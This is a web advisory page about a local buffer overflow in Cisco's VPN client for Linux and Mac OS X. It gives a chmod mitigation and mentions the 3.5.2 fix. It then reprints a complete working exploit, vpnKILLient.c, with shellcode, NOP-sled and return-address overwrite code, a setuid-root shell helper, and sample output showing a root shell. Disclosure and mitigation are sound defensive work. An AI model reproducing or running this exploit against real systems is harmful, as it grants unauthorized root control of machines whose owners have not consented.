Cisco VPN Client For Mac OS X can be exploited locally About Cisco VPN Client: The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network. Information: Cisco's VPN Client for Mac OS X, Linux and Solaris contains a security vulnerability which results in administrative privledges via a exploit. The Virtual Private Network (VPN) client allows for the Non-Windows platform to function over a VPN network. Window's users need not worry by this particular security advisory. A local user could exploit the Cisco UNIX VPN client software if installed on the computer by executing arbitrary code granting administrative privledges. If the user has not altered the setuid permissions vpnclient will give administrative privledges allowing the user to modify any part of the system without authorization. Fix/Update The vpnclient vulernability may be mitigated by altering the permission of the binary using the chmod command. In the Terminal window as administrative or root account execute the following command: /bin/chmod 755 /usr/local/bin/vpnclient The vulnerability has been fixed in version 3.5.2 which should be made downloadable by Cisco shortly via their website. Go to the Cisco Software distribution center at Cisco's Web Page to download the new version of the UNIX VPN client. Exploit/Code for Cisco VPN Client for Linux/Mac OS X The code from AngryPacket Security - vpnKILLient.c is listed below for example to see how the exploit is executed. /* buffer overflow for cisco's vpnclient for linux tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz to get this to properly work, you need to put the following code into xx.c, compile it (as xx), and place the executable into /tmp (to bypass tight PAM restrictions) #include <stdio.h> main() { setuid(0); execl("/bin/sh", "sh", NULL); } then compile this and run it. syntax is ./vpnclient <offset> tested under gentoo linux and debian: $ ls -la `which vpnclient` -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient $ ./vpnKILLient  addr: 0xbffffbac, offset: 0 Cisco Systems VPN Client Version 3.5.1 (Rel) Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved. Client Type(s): Linux Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686 sh-2.05a# id uid=0(root) gid=100(users) groups=100(users),10(wheel) greetz: all of the angrypacket crew (of course) shok -> pheerable^2; vegac -> 31336++; when you get a chance, check out http://sec.angrypacket.com */ #include <stdio.h> #include <string.h> #include <unistd.h> #define NOP 0x90 #define LEN 620 /* 520 to own eip */ /* shellcode by vegac (setuid(0)->/tmp/xx) */ /* wont work if your /tmp partition is mounted noexec or nosuid */ char shell[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x78\x78" "\x68\x2f\x74\x6d\x70\x89\xe3\x31" "\xc0\x50\x89\xe2\x54\x89\xe1\xb0" "\x0b\xcd\x80\x00"; unsigned long get_sp (void) { __asm__("mov %esp,%eax"); } int main(int argc, char *argv[]) { int i, offset=0; long addr; char *buf, *ptr; if(argc > 1) offset = atoi(argv[1]); buf = (char *)malloc(sizeof(char) * LEN); bzero(buf, LEN); addr = get_sp() - offset; printf("addr: 0x%x, offset: %d\n", addr, offset); for(i = 0; i < LEN; i += 4) { *(long *)&buf[i] = addr; } for(i = 0; i < (LEN / 2); i++) { *(buf + i) = NOP; } ptr = buf + ((LEN / 2) - (strlen(shell) / 2)); for(i = 0; i < strlen(shell); i++) { *(ptr++) = shell[i]; } buf[LEN - 1] = '\0'; execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0); return(0); } More details can be obtained by visiting the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client Feedback Time: Enter Email Address: Enter your message: Select Either of These Two Buttons Special thanks goes out to Jess K. Frykholm for making us aware of this security issue!